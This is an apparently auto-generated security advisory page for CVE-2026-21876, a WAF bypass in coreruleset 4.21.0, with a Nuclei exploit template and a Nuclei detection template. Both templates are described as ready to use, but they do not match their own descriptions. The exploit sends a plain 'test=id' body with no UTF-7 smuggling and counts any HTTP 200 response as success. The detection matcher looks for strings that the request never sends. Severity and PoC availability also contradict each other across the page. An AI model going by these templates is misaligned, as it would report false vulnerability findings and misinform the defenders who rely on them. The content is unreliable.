[webapps] coreruleset 4.21.0 - Firewall Bypass
CVE-2026-21876
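Vulnerability
High · CVSS N/A

📋 Basic Vulnerability Information
| CVE | CVE-2026-21876 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See the original post |
| Severity | High · CVSS N/A |
| Published | 2026-05-13 |
| Submitted by | Daytrift Newgen |
| Source | Exploit-DB (original post) |

⚔️ Nuclei Exploit Template
The following is an exploit template in the standard Nuclei v3 format that can be used directly to verify the vulnerability: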
```yaml
id: CVE-2026-21876-exploit

info:
  name: Coreruleset 4.21.0 - Firewall Bypass Exploit
  author: Daytrift Newgen
  severity: medium
  description: Exploits the Coreruleset firewall bypass vulnerability by sending a crafted POST request with UTF-7 encoded form data and an extra 'aBdC401' field to evade WAF rules. The target version must be < 4.22.0/3.3.8.
  reference:
    - https://github.com/coreruleset/coreruleset
    - https://github.com/coreruleset/coreruleset
  tags: cve,cve2026,coreruleset,waf,exploit

# Declared but not referenced by the request below.
variables:
  cmd: "id"

http:
  # The body as written is a plain urlencoded field; it carries no UTF-7
  # content and no 'aBdC401' field, despite the description above.
  - raw:
      - |
        POST {{BaseURL}}/path/to/test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        test=id

    # Status-only matcher: any endpoint that answers 200 matches, so a hit
    # does not by itself show that a WAF rule was bypassed.
    matchers:
      - type: status
        status:
          - 200
```

🔍 Nuclei Detection Template
The following is a detection template for determining whether a target is affected:
```yaml
id: CVE-2026-21876-detection

info:
  name: Coreruleset 4.21.0 - Firewall Bypass Detection
  author: Daytrift Newgen
  severity: medium
  description: Detects if Coreruleset version <= 4.21.0 is vulnerable to a firewall bypass via UTF-7 encoded multipart form-data smuggling. The vulnerability exists in versions < 4.22.0/3.3.8.
  reference:
    - https://github.com/coreruleset/coreruleset
    - https://github.com/coreruleset/coreruleset
  tags: cve,cve2026,coreruleset,waf,firewall,bypass

http:
  - method: POST
    path:
      - "{{BaseURL}}/path/to/test"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    body: "test=id"

    matchers-condition: and
    matchers:
      # The word matcher looks for these strings in the response; the request
      # above sends neither of them.
      - type: word
        words:
          - "Content-Type: text/plain; charset=utf-7"
          - "Content-Disposition: form-data; name=\"aBdC401\""
        condition: or
        part: response
      - type: status
        status:
          - 200
```

🛡️ Remediation
Upgrade to the vendor's latest security release.
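
🚨 Threat Assessment
| 📈 EPSS exploitation probability | No data available |
|---|---|
| 🚨 CISA KEV | Not known to be exploited |
| 🔧 Public PoC | No public PoC available |

⚠️ This article is based on public vulnerability databases and is intended only as a reference for security research and defense. Generated: 2026-05-20 08:07 | Source: Exploit-DB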